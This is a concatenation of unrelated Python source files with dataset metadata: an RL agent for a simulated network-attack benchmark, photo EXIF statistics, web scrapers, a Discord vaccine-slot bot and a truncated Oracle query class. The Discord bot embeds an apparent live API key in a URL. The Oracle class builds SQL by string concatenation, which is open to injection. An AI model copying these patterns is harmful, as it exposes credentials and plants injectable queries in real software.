{"api_name": "dbus.mainloop.glib.DBusGMainLoop", "line_number": 263, "usage_type": "call"}, {"api_name": "dbus.mainloop", "line_number": 263, "usage_type": "attribute"}, {"api_name": "dbus.SystemBus", "line_number": 264, "usage_type": "call"}, {"api_name": "dbus.Interface", "line_number": 270, "usage_type": "call"}, {"api_name": "dbus.Interface", "line_number": 273, "usage_type": "call"}, {"api_name": "gi.repository.GLib.MainLoop", "line_number": 279, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 279, "usage_type": "name"}, {"api_name": "example_gatt_server.register_app_cb", "line_number": 282, "usage_type": "name"}, {"api_name": "example_gatt_server.register_app_error_cb", "line_number": 283, "usage_type": "name"}, {"api_name": "example_advertisement.register_ad_cb", "line_number": 285, "usage_type": "name"}, {"api_name": "example_advertisement.register_ad_error_cb", "line_number": 286, "usage_type": "name"}]} +{"seq_id": "19216368913", "text": "\"\"\"An example Tabular, epsilon greedy Q-Learning Agent.\n\nThis agent does not use an Experience replay (see the 'ql_replay_agent.py')\n\nIt uses pytorch 1.5+ tensorboard library for logging (HINT: these dependencies\ncan be installed by running pip install nasim[dqn])\n\nTo run 'tiny' benchmark scenario with default settings, run the following from\nthe nasim/agents dir:\n\n$ python ql_agent.py tiny\n\nTo see detailed results using tensorboard:\n\n$ tensorboard --logdir runs/\n\nTo see available hyperparameters:\n\n$ python ql_agent.py --help\n\nNotes\n-----\n\nThis is by no means a state of the art implementation of Tabular Q-Learning.\nIt is designed to be an example implementation that can be used as a reference\nfor building your own agents and for simple experimental comparisons.\n\"\"\"\nimport random\nimport numpy as np\nfrom pprint import pprint\n\nimport nasim\n\ntry:\n from torch.utils.tensorboard import SummaryWriter\nexcept ImportError as e:\n from gymnasium import error\n raise error.DependencyNotInstalled(\n f\"{e}. (HINT: you can install tabular_q_learning_agent dependencies \"\n \"by running 'pip install nasim[dqn]'.)\"\n )\n\n\nclass TabularQFunction:\n \"\"\"Tabular Q-Function \"\"\"\n\n def __init__(self, num_actions):\n self.q_func = dict()\n self.num_actions = num_actions\n\n def __call__(self, x):\n return self.forward(x)\n\n def forward(self, x):\n if isinstance(x, np.ndarray):\n x = str(x.astype(np.int))\n if x not in self.q_func:\n self.q_func[x] = np.zeros(self.num_actions, dtype=np.float32)\n return self.q_func[x]\n\n def forward_batch(self, x_batch):\n return np.asarray([self.forward(x) for x in x_batch])\n\n def update_batch(self, s_batch, a_batch, delta_batch):\n for s, a, delta in zip(s_batch, a_batch, delta_batch):\n q_vals = self.forward(s)\n q_vals[a] += delta\n\n def update(self, s, a, delta):\n q_vals = self.forward(s)\n q_vals[a] += delta\n\n def get_action(self, x):\n return int(self.forward(x).argmax())\n\n def display(self):\n pprint(self.q_func)\n\n\nclass TabularQLearningAgent:\n \"\"\"A Tabular. epsilon greedy Q-Learning Agent using Experience Replay \"\"\"\n\n def __init__(self,\n env,\n seed=None,\n lr=0.001,\n training_steps=10000,\n final_epsilon=0.05,\n exploration_steps=10000,\n gamma=0.99,\n verbose=True,\n **kwargs):\n\n # This implementation only works for flat actions\n assert env.flat_actions\n self.verbose = verbose\n if self.verbose:\n print(\"\\nRunning Tabular Q-Learning with config:\")\n pprint(locals())\n\n # set seeds\n self.seed = seed\n if self.seed is not None:\n np.random.seed(self.seed)\n\n # envirnment setup\n self.env = env\n\n self.num_actions = self.env.action_space.n\n self.obs_dim = self.env.observation_space.shape\n\n # logger setup\n self.logger = SummaryWriter()\n\n # Training related attributes\n self.lr = lr\n self.exploration_steps = exploration_steps\n self.final_epsilon = final_epsilon\n self.epsilon_schedule = np.linspace(\n 1.0, self.final_epsilon, self.exploration_steps\n )\n self.discount = gamma\n self.training_steps = training_steps\n self.steps_done = 0\n\n # Q-Function\n self.qfunc = TabularQFunction(self.num_actions)\n\n def get_epsilon(self):\n if self.steps_done < self.exploration_steps:\n return self.epsilon_schedule[self.steps_done]\n return self.final_epsilon\n\n def get_egreedy_action(self, o, epsilon):\n if random.random() > epsilon:\n return self.qfunc.get_action(o)\n return random.randint(0, self.num_actions-1)\n\n def optimize(self, s, a, next_s, r, done):\n # get q_val for state and action performed in that state\n q_vals_raw = self.qfunc.forward(s)\n q_val = q_vals_raw[a]\n\n # get target q val = max val of next state\n target_q_val = self.qfunc.forward(next_s).max()\n target = r + self.discount * (1-done) * target_q_val\n\n # calculate error and update\n td_error = target - q_val\n td_delta = self.lr * td_error\n\n # optimize the model\n self.qfunc.update(s, a, td_delta)\n\n s_value = q_vals_raw.max()\n return td_error, s_value\n\n def train(self):\n if self.verbose:\n print(\"\\nStarting training\")\n\n num_episodes = 0\n training_steps_remaining = self.training_steps\n\n while self.steps_done < self.training_steps:\n ep_results = self.run_train_episode(training_steps_remaining)\n ep_return, ep_steps, goal = ep_results\n num_episodes += 1\n training_steps_remaining -= ep_steps\n\n self.logger.add_scalar(\"episode\", num_episodes, self.steps_done)\n self.logger.add_scalar(\n \"epsilon\", self.get_epsilon(), self.steps_done\n )\n self.logger.add_scalar(\n \"episode_return\", ep_return, self.steps_done\n )\n self.logger.add_scalar(\n \"episode_steps\", ep_steps, self.steps_done\n )\n self.logger.add_scalar(\n \"episode_goal_reached\", int(goal), self.steps_done\n )\n\n if num_episodes % 10 == 0 and self.verbose:\n print(f\"\\nEpisode {num_episodes}:\")\n print(f\"\\tsteps done = {self.steps_done} / \"\n f\"{self.training_steps}\")\n print(f\"\\treturn = {ep_return}\")\n print(f\"\\tgoal = {goal}\")\n\n self.logger.close()\n if self.verbose:\n print(\"Training complete\")\n print(f\"\\nEpisode {num_episodes}:\")\n print(f\"\\tsteps done = {self.steps_done} / {self.training_steps}\")\n print(f\"\\treturn = {ep_return}\")\n print(f\"\\tgoal = {goal}\")\n\n def run_train_episode(self, step_limit):\n s, _ = self.env.reset()\n done = False\n env_step_limit_reached = False\n\n steps = 0\n episode_return = 0\n\n while not done and not env_step_limit_reached and steps < step_limit:\n a = self.get_egreedy_action(s, self.get_epsilon())\n\n next_s, r, done, env_step_limit_reached, _ = self.env.step(a)\n self.steps_done += 1\n td_error, s_value = self.optimize(s, a, next_s, r, done)\n self.logger.add_scalar(\"td_error\", td_error, self.steps_done)\n self.logger.add_scalar(\"s_value\", s_value, self.steps_done)\n\n s = next_s\n episode_return += r\n steps += 1\n\n return episode_return, steps, self.env.goal_reached()\n\n def run_eval_episode(self,\n env=None,\n render=False,\n eval_epsilon=0.05,\n render_mode=\"human\"):\n if env is None:\n env = self.env\n\n original_render_mode = env.render_mode\n env.render_mode = render_mode\n\n s, _ = env.reset()\n done = False\n env_step_limit_reached = False\n\n steps = 0\n episode_return = 0\n\n line_break = \"=\"*60\n if render:\n print(\"\\n\" + line_break)\n print(f\"Running EVALUATION using epsilon = {eval_epsilon:.4f}\")\n print(line_break)\n env.render()\n input(\"Initial state. Press enter to continue..\")\n\n while not done and not env_step_limit_reached:\n a = self.get_egreedy_action(s, eval_epsilon)\n next_s, r, done, env_step_limit_reached, _ = env.step(a)\n s = next_s\n episode_return += r\n steps += 1\n if render:\n print(\"\\n\" + line_break)\n print(f\"Step {steps}\")\n print(line_break)\n print(f\"Action Performed = {env.action_space.get_action(a)}\")\n env.render()\n print(f\"Reward = {r}\")\n print(f\"Done = {done}\")\n print(f\"Step limit reached = {env_step_limit_reached}\")\n input(\"Press enter to continue..\")\n\n if done or env_step_limit_reached:\n print(\"\\n\" + line_break)\n print(\"EPISODE FINISHED\")\n print(line_break)\n print(f\"Goal reached = {env.goal_reached()}\")\n print(f\"Total steps = {steps}\")\n print(f\"Total reward = {episode_return}\")\n\n env.render_mode = original_render_mode\n return episode_return, steps, env.goal_reached()\n\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"env_name\", type=str, help=\"benchmark scenario name\")\n parser.add_argument(\"--render_eval\", action=\"store_true\",\n help=\"Renders final policy\")\n parser.add_argument(\"--lr\", type=float, default=0.001,\n help=\"Learning rate (default=0.001)\")\n parser.add_argument(\"-t\", \"--training_steps\", type=int, default=10000,\n help=\"training steps (default=10000)\")\n parser.add_argument(\"--batch_size\", type=int, default=32,\n help=\"(default=32)\")\n parser.add_argument(\"--seed\", type=int, default=0,\n help=\"(default=0)\")\n parser.add_argument(\"--replay_size\", type=int, default=100000,\n help=\"(default=100000)\")\n parser.add_argument(\"--final_epsilon\", type=float, default=0.05,\n help=\"(default=0.05)\")\n parser.add_argument(\"--init_epsilon\", type=float, default=1.0,\n help=\"(default=1.0)\")\n parser.add_argument(\"-e\", \"--exploration_steps\", type=int, default=10000,\n help=\"(default=10000)\")\n parser.add_argument(\"--gamma\", type=float, default=0.99,\n help=\"(default=0.99)\")\n parser.add_argument(\"--quite\", action=\"store_false\",\n help=\"Run in Quite mode\")\n args = parser.parse_args()\n\n env = nasim.make_benchmark(\n args.env_name,\n args.seed,\n fully_obs=True,\n flat_actions=True,\n flat_obs=True\n )\n ql_agent = TabularQLearningAgent(\n env, verbose=args.quite, **vars(args)\n )\n ql_agent.train()\n ql_agent.run_eval_episode(render=args.render_eval)\n", "repo_name": "Jjschwartz/NetworkAttackSimulator", "sub_path": "nasim/agents/ql_agent.py", "file_name": "ql_agent.py", "file_ext": "py", "file_size_in_byte": 10578, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 109, "dataset": "github-code", "pt": "61", "api": [{"api_name": "gymnasium.error.DependencyNotInstalled", "line_number": 38, "usage_type": "call"}, {"api_name": "gymnasium.error", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 62, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 77, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 119, "usage_type": "call"}, {"api_name": "random.random", "line_number": 135, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 137, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 280, "usage_type": "call"}, {"api_name": "nasim.make_benchmark", "line_number": 306, "usage_type": "call"}]} +{"seq_id": "22959433973", "text": "from __future__ import division\n__author__ = 'Volodymyr Varchuk'\n\n\n\n\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\nimport pprint\nimport fnmatch\nimport os\nimport exif\nimport json\n\n\ndef get_files(dir_path):\n matches = []\n for root, dirnames, filenames in os.walk(dir_path):\n print(root)\n # print(dirnames)\n print(len(filenames))\n for filename in fnmatch.filter(filenames, '*.jpg'):\n matches.append(os.path.join(root, filename))\n for filename in fnmatch.filter(filenames, '*.nef'):\n matches.append(os.path.join(root, filename))\n for filename in fnmatch.filter(filenames, '*.JPG'):\n matches.append(os.path.join(root, filename))\n for filename in fnmatch.filter(filenames, '*.NEF'):\n matches.append(os.path.join(root, filename))\n return matches\n\ndef get_exif(i):\n ret = {}\n info = i._getexif()\n if info is not None:\n for tag, value in info.items():\n decoded = TAGS.get(tag, tag)\n if decoded == 'FocalLength':\n v1, v2 = value\n value = int(v1/v2)\n if decoded == 'ExposureTime':\n v1, v2 = value\n if v1 < v2:\n value = str('1/{0}'.format(int(v2/v1)))\n else:\n value = v1/v2\n ret[decoded] = str(value)\n return ret\n\ndef get_nikon_exif(path_name):\n f = open(path_name, 'rb')\n tags = exif.process_file(f)\n f.close()\n return tags\n\n\ndef get_exif_param(exif_dict, param):\n if param in exif_dict.keys():\n return str(exif_dict[param]).strip()\n else:\n return 'None'\n\n\ndef get_exif_re(exif_dict, tag_value):\n if tag_value in exif_dict.keys():\n return str(exif_dict[tag_value])\n\ndef get_files_stats(search_dir):\n files = get_files(search_dir)\n stats = []\n for file_name in files:\n s_path = file_name.split(os.path.sep)\n skip = False\n for p_element in s_path:\n if p_element.startswith('convert'):\n skip = True\n # print(file_name, 'SKIPPED')\n if not skip:\n im = Image.open(file_name)\n if file_name.endswith('.nef') or file_name.endswith('.NEF'):\n exif_dict = get_nikon_exif(file_name)\n d_element = {}\n d_element['dir'] = os.path.sep.join(file_name.split(os.path.sep)[:-1])\n d_element['file'] = file_name\n d_element['FocalLength'] = get_exif_re(exif_dict, 'EXIF FocalLength')\n d_element['ExposureTime'] = get_exif_re(exif_dict, 'EXIF ExposureTime')\n d_element['ISOSpeedRatings'] = get_exif_re(exif_dict, 'EXIF ISOSpeedRatings')\n d_element['Make'] = get_exif_re(exif_dict, 'Image Make')\n d_element['Model'] = get_exif_re(exif_dict, 'Image Model')\n d_element['Date'] = get_exif_re(exif_dict, 'EXIF DateTimeDigitized')\n d_element['Orientation'] = 'Horizontal' if get_exif_param(exif_dict, 'Image Orientation').startswith('Horizontal') else 'Vertical'\n else:\n exif_dict = get_exif(im)\n d_element = {}\n d_element['dir'] = os.path.sep.join(file_name.split(os.path.sep)[:-1])\n d_element['file'] = file_name\n d_element['FocalLength'] = get_exif_param(exif_dict, 'FocalLength')\n d_element['ExposureTime'] = get_exif_param(exif_dict, 'ExposureTime')\n d_element['ISOSpeedRatings'] = get_exif_param(exif_dict, 'ISOSpeedRatings')\n d_element['Make'] = get_exif_param(exif_dict,'Make')\n d_element['Model'] = get_exif_param(exif_dict,'Model')\n d_element['Date'] = get_exif_param(exif_dict, 'DateTimeDigitized')\n d_element['Orientation'] = 'Horizontal' if get_exif_param(exif_dict, 'Orientation') in [1,2,3,4] else 'Vertical'\n stats.append(d_element)\n return stats\n\n\ndef group_data(stats):\n grouped_data = {}\n for image_data in stats:\n for param_name in image_data:\n if param_name == 'file' or param_name == 'dir' or param_name == 'Date':\n continue\n if not param_name in grouped_data.keys():\n grouped_data[param_name] = {image_data[param_name]:1}\n if image_data[param_name] in grouped_data[param_name].keys():\n grouped_data[param_name][image_data[param_name]] = grouped_data[param_name][image_data[param_name]]+1\n else:\n grouped_data[param_name][image_data[param_name]] = 1\n return grouped_data\n\n\ndef group_data2(stats, total_count):\n grouped_data2 = {}\n\ndef dump_to_file(stats, file_name):\n f_out = open(file_name, 'w')\n headers = stats[0].keys()\n sss = ';'.join(headers) + ';\\n'\n f_out.write(sss)\n for row in stats:\n sss = ';'.join(row.values()) + ';\\n'\n f_out.write(sss)\n f_out.close()\n\n\nnef_file = '/media/sf_share_linux/p/DSC_0034.NEF'\njpg_file = '/media/sf_share_linux/p/DSC_0011.JPG'\n\ncsv_file = '/media/sf_share_linux/p/raw.txt'\nstat_file = '/media/sf_share_linux/p/stat.txt'\n\nprint(get_nikon_exif(nef_file))\nprint(get_exif(Image.open(jpg_file)))\npp = pprint.PrettyPrinter(indent=4)\n# search_dir = '/media/sf_All_Fotos/US Foto'\nsearch_dir = u'/media/sf_All_Fotos/US Foto/LV/Allfotos/2016-03-12_01_Road_To_SR'\n\nstats = get_files_stats(search_dir)\ndump_to_file(stats, csv_file)\ngrouped_data = group_data(stats)\npp.pprint(grouped_data)\n\nst_file = open(stat_file, 'w')\njson.dump(grouped_data, st_file)\nst_file.close()", "repo_name": "VarchukVladimir/strange_repo", "sub_path": "images_stats.py", "file_name": "images_stats.py", "file_ext": "py", "file_size_in_byte": 5615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.walk", "line_number": 18, "usage_type": "call"}, {"api_name": "fnmatch.filter", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "fnmatch.filter", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "fnmatch.filter", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "fnmatch.filter", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags.TAGS.get", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 37, "usage_type": "name"}, {"api_name": "exif.process_file", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 79, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 79, "usage_type": "name"}, {"api_name": "os.path.sep.join", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.path.sep.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 144, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 144, "usage_type": "name"}, {"api_name": "pprint.PrettyPrinter", "line_number": 145, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 155, "usage_type": "call"}]} +{"seq_id": "16034817213", "text": "from bs4 import BeautifulSoup\nimport requests\n\nfrom locators.route_page_locators import RoutePagePrinterLocators\nfrom parsers.photo import PhotoParser\nfrom parsers.comment import CommentParser\nfrom text_mining.text_miners import bolt_text_bad\n\n#logger = logging.getLogger('books_app.books_page')\n\nclass RoutePage:\n def __init__(self, url): #takes in entire html page from requests\n self.url = url\n content = requests.get(url+'?print=1').content\n self.soup = BeautifulSoup(content, 'html.parser')\n\n @property\n def name(self):\n locator = RoutePagePrinterLocators.NAME\n name_tag = self.soup.select(locator)[0]\n return name_tag.get_text()\n \n @property\n def description(self):\n #locator = RoutePagePrinterLocators.DESCRIPTION\n description_title_tags = self.soup.find('h3', string='Description')\n try:\n description_tag = description_title_tags.find_next_sibling('div')\n return description_tag.get_text()\n except AttributeError:\n return ''\n\n @property\n def protection(self):\n #locator = RoutePagePrinterLocators.PROTECTION\n protection_title_tags = self.soup.find('h3', string='Protection')\n try:\n protection_tag = protection_title_tags.find_next_sibling('div')\n return protection_tag.get_text()\n except AttributeError:\n return ''\n\n @property\n def photo_captions(self):\n locator = RoutePagePrinterLocators.PHOTOS\n photo_tags = self.soup.select(locator)\n return [PhotoParser(e) for e in photo_tags]\n\n @property\n def comments(self):\n locator = RoutePagePrinterLocators.COMMENTS\n comment_tags = self.soup.select(locator)\n return [CommentParser(e) for e in comment_tags]\n \n @property\n def bad_gear(self): #return dict with bool for any flags and other fields for\n flag = []\n flag += bolt_text_bad(self.description)\n flag += bolt_text_bad(self.protection)\n \n for photo in self.photo_captions:\n flag += bolt_text_bad(photo.caption)\n\n for comment in self.comments:\n flag += bolt_text_bad(comment.content)\n \n return flag\n\n", "repo_name": "hanswebster/mountain_project_bad_hardware", "sub_path": "pages/route_page.py", "file_name": "route_page.py", "file_ext": "py", "file_size_in_byte": 2239, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 15, "usage_type": "call"}, {"api_name": "locators.route_page_locators.RoutePagePrinterLocators.NAME", "line_number": 19, "usage_type": "attribute"}, {"api_name": "locators.route_page_locators.RoutePagePrinterLocators", "line_number": 19, "usage_type": "name"}, {"api_name": "locators.route_page_locators.RoutePagePrinterLocators.PHOTOS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "locators.route_page_locators.RoutePagePrinterLocators", "line_number": 45, "usage_type": "name"}, {"api_name": "parsers.photo.PhotoParser", "line_number": 47, "usage_type": "call"}, {"api_name": "locators.route_page_locators.RoutePagePrinterLocators.COMMENTS", "line_number": 51, "usage_type": "attribute"}, {"api_name": "locators.route_page_locators.RoutePagePrinterLocators", "line_number": 51, "usage_type": "name"}, {"api_name": "parsers.comment.CommentParser", "line_number": 53, "usage_type": "call"}, {"api_name": "text_mining.text_miners.bolt_text_bad", "line_number": 58, "usage_type": "call"}, {"api_name": "text_mining.text_miners.bolt_text_bad", "line_number": 59, "usage_type": "call"}, {"api_name": "text_mining.text_miners.bolt_text_bad", "line_number": 62, "usage_type": "call"}, {"api_name": "text_mining.text_miners.bolt_text_bad", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "30872633938", "text": "import json\n\nimport httplib2\nimport yaml\n\n\ndef get_todays_links(link, today):\n config = yaml.load(open('config.yaml'))\n links = []\n\n h = httplib2.Http()\n (resp_headers, content) = h.request(link, 'get')\n try:\n all_data = json.loads(content.decode('utf-8-sig'))[0][today]\n for data in all_data:\n links.append(config['nhk_root'] + data['news_id'] + '/'\n + data['news_id'] + '.html')\n\n return links\n except Exception as e:\n print(e)\n print('No links yet for today')\n return []", "repo_name": "JMoravec/NHKEasyRSS", "sub_path": "get_todays_links.py", "file_name": "get_todays_links.py", "file_ext": "py", "file_size_in_byte": 568, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "yaml.load", "line_number": 8, "usage_type": "call"}, {"api_name": "httplib2.Http", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "8840726939", "text": "import discord\nimport os\nimport time\nfrom bs4 import BeautifulSoup\nfrom discord import state\nimport requests\nfrom dotenv import load_dotenv\nload_dotenv(\".env\")\n\nclient = discord.Client()\n@client.event\nasync def on_ready():\n print(\"We have logged in as {0.user}\".format(client))\n\n@client.event\n\nasync def on_message(msg):\n if msg.author==client.user:\n return\n if msg.content.startswith(\"$weather\"):\n resp = requests.get(\"http://dataservice.accuweather.com/forecasts/v1/hourly/1hour/193826?apikey=2A7yNWDokHDYBNQuyRJVYvgrdeg58flk%20&language=en-us&details=true&metric=true\")\n await msg.channel.send(resp.json()[0]['RainProbability'])\n await msg.channel.send(\" - Rain probability\")\n if msg.content.startswith(\"$sc\"):\n sc = msg.content[3:]\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'}\n url2 = \"https://cdn-api.co-vin.in/api/v2/admin/location/districts/{}\".format(sc)\n resp2 = requests.get(url2, headers=headers)\n data2 = resp2.json()['districts']\n await msg.channel.send(\"district codes acording to state you selected \")\n for d in data2:\n await msg.channel.send(d)\n await msg.channel.send(\"enter in following format : '$cowin disctrict_code date_dd-mm-yyyy'\")\n if msg.content.startswith(\"$cowin\"):\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'}\n if len(msg.content) == 6:\n await msg.channel.send(\"State codes are \")\n url3 = \"https://cdn-api.co-vin.in/api/v2/admin/location/states\"\n resp3 = requests.get(url3,headers=headers)\n data3 = resp3.json()['states']\n for states in data3:\n await msg.channel.send(states)\n await msg.channel.send(\"Enter your state code as $sc'statecode'\")\n \n dis = msg.content[7:10]\n date = msg.content[11:21]\n url1 = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByDistrict?district_id={}&date={}\".format(dis,date)\n \n resp1 = requests.get(url1,headers=headers)\n data = resp1.json()['sessions']\n\n for x in data:\n c = x['available_capacity']\n a = x['address']\n if c>0:\n await msg.channel.send(a)\n await msg.channel.send(\"available dose : {}\".format(c))\nclient.run(os.environ.get('newtoken'))", "repo_name": "adarshg98765/bot1", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2356, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 8, "usage_type": "call"}, {"api_name": "discord.Client", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 28, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 58, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 58, "usage_type": "attribute"}]} +{"seq_id": "41772166865", "text": "# -*- coding:utf-8 -*-\n\n__author__ = 'wenbin'\n\nfrom selenium import webdriver\nfrom gne import GeneralNewsExtractor\nfrom time import sleep\nimport csv\n\n\"\"\"switch to new open window\n\"\"\"\ndef switch_new_window():\n all_handles = browser.window_handles\n current_handle = browser.current_window_handle\n for new_handle in all_handles:\n if new_handle != current_handle:\n browser.switch_to.window(new_handle)\n\n\nfile = open('/files/sogou_news_data.csv', 'w', encoding='utf-8-sig')\nwriter = csv.writer(file)\nwriter.writerow(('新闻标题','新闻发布时间','新闻作者','新闻正文','新闻插图'))\n\n# 搜索关键词\nkeyword = \"托育\"\n\n# 驱动,打开头条门户首页\nbrowser = webdriver.Chrome(\"/usr/local/bin/chromedriver\")\nbrowser.get(\"https://www.sogou.com/sogou?ie=utf8&interation=1728053249&interV=&pid=sogou-wsse-9fc36fa768a74fa9&mode=1&p=31040300&query={}\".format(keyword))\nsleep(3)\n\nfor i in range(1,11):\n browser.find_element_by_xpath('/html/body/div[3]/div[2]/div[1]/div[2]/div/div[{}]/div/h3/a'.format(i)).click()\n switch_new_window()\n extractor = GeneralNewsExtractor()\n result = extractor.extract(browser.page_source)\n writer.writerow((result['title'], result['publish_time'], result['author'], result['content'], result['images']))\n browser.close()\n browser.switch_to.window(browser.window_handles[0])\n\nsleep(3)\nbrowser.quit()", "repo_name": "chenwenbin69/spider", "sub_path": "spiders/sogou.py", "file_name": "sogou.py", "file_ext": "py", "file_size_in_byte": 1391, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "csv.writer", "line_number": 21, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 28, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 28, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "gne.GeneralNewsExtractor", "line_number": 35, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "73515102913", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''\ntitle: Definicion del la clase BBDD\n\nAutor: Erick Cruz Cedeño\n'''\n#importamos librerias y clases necesarias\nimport cx_Oracle\nfrom vuelo import Vol\nfrom seient import Seient\n\n#Definicion clase BBDD, Esta nos permitira realizar consulta sql, en la cual podremoas obtener vuelos, asientos, etc..\nclass BBDD:\n #modifiqueu usuari i contrasenya pel que correspongui\n usuari = \"your id\"\n contrasenya = \"your password\"\n conn = None\n\n def obreConnexio(self): #permite conectarnos con el oracle\n dsn_tns = cx_Oracle.makedsn('sab-oracle.uab.es','1521', service_name='polux')\n self.conn = cx_Oracle.connect(user=self.usuari, password=self.contrasenya, dsn=dsn_tns)\n\n def tancaConnexio(self): #permite cerrar la coneccion con aracle\n self.conn.close()\n\n # donat un codi d'aeroport, retorna el nom de l'aeroport\n def obteNomAeroport(self,codiAero):\n self.obreConnexio() # abre la coneccion en els ervidor de oracle\n try: #intenta realizar lo que hay dentro del sangriado y si hay algun fallo, pasara al except\n cur = self.conn.cursor() #intenta conectar\n cur.execute(\"select nom from aeroport where codi_aeroport = '\" + codiAero + \"'\") # 2n forma (bind variables): cur.execute(\"SELECT * FROM mytab WHERE mycol = :mybv\", mybv=myvar)\n n_aerop = \"\" # creo un varible vacia dnd se guardara el aeropueto que concida con su codigo\n for i in cur: # recorro cur donde almacena la sql query\n n_aerop = i[0] # guardo el el resultado en la varible\n cur.close() # cierro y desconectamos coneccion\n self.tancaConnexio() # cirra la coneccion con oracle\n return n_aerop # retornamos la varible con el nombre del aeropuerto\n except: # si hay algun error en las lineas de try, pasara al except\n self.tancaConnexio() # cerrara la connecion\n\n # obetenemos un lista de asientos, realizando una consulta dando por parametro el codigo y la fecha del vuelo\n def obteLlistaSeients(self,codivol,data):\n self.obreConnexio() #abre la coneccion en els ervidor de oracle\n try: #intenta ejecutar lo que hay dentro del sangriado\n cur = self.conn.cursor() #abre coneccion con oreacle\n #executem la consulta SQL. combinem text fix amb text que ens passen per parà metre\n data = data.date() #data(), perimite que si la fecha esta en formato dia,mes,año y horas solo coguera la yyyy-mm-dd\n cur.execute(\"select fila, lletra from seient where codi_vol= '\" +codivol+ \"' and data=to_date('\" +str(data)+ \"', 'yyyy-mm-dd')\") #ejecutamos la consulta sql\n #creem una llista buida que contindrà tots els seients del vol\n llista = [] #lista vacia donde se guardaran los asientos de la consulta\n #la consulta podria retornar diverses files. les recorrem\n for tupla in cur:\n #per cada fila, podem obtenir les columnes\n #en aquest exemple, la columna fila és la primera, i la lletra la segona\n seat = Seient() #creamos un objeto seient\n seat.readBBDD(tupla[0],tupla[1]) #permite atribuir el asineto con su fila y letra\n llista.append(seat) #este asiento se inserta en la lista\n cur.close() #cierra la consulta\n #retornem la llista\n #és una llista de llistes: per a cada tupla, conté dos camps: la fila i la lletra\n self.tancaConnexio() #al finalizar el recorrido, se cerrara la conneccion con oracle\n return llista #retorna la lista con los asientos de la consulta generada\n except: #en caso que no se pueda conectar, cierra la connecion\n self.tancaConnexio()\n\n # donat un codi d'aeroport, obté el codi, la 